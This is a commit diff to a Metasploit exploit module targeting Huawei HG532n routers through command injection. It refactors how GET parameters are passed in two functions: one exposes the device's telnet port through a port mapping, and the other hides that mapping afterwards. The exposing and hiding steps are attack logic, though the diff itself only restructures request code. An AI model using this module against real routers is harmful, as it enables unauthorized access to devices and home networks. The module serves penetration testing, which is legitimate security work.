huawei_hg532n_cmdinject: Use send_request_cgi() 'vars_get' key

a-darwish · a-darwish · commit e21504b22dda · 2017-04-17T09:11:50.000+02:00
Instead of rolling our own GET parameters implementation. Thanks @wvu-r7!
diff --git a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
@@ -184,15 +184,18 @@ def expose_telnet_port(session_cookies)
     external_telnet_port = rand(32767) + 32768
 
     portmapping_page = '/html/application/portmapping.asp'
-    url_append = "?x=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.PortMapping&RequestFile=#{portmapping_page}"
     valid_port_export_marker = "var pageName = '#{portmapping_page}';"
     invalid_port_export_marker = /var ErrInfo = \d+/
 
     res = send_request_cgi(
       'method'    => 'POST',
-      'uri'       => '/html/application/addcfg.cgi' + url_append,
+      'uri'       => '/html/application/addcfg.cgi',
       'cookie'    => cookie,
       'headers'   => { 'Referer' => "http://#{rhost}#{portmapping_page}" },
+      'vars_get'  => {
+        'x'           => 'InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.PortMapping',
+        'RequestFile' => portmapping_page
+      },
       'vars_post' => {
         'x.PortMappingProtocol'    => "TCP",
         'x.PortMappingEnabled'     => "1",
@@ -250,9 +253,10 @@ def hide_exposed_telnet_port(session_cookies)
 
     res = send_request_cgi(
       'method'    => 'POST',
-      'uri'       => "/html/application/del.cgi?RequestFile=#{portmapping_page}",
+      'uri'       => '/html/application/del.cgi',
       'cookie'    => cookie,
       'headers'   => { 'Referer' => "http://#{rhost}#{portmapping_page}" },
+      'vars_get'  => { 'RequestFile' => portmapping_page },
       'vars_post' => vars_post
     )
     return if res && res.code == 200
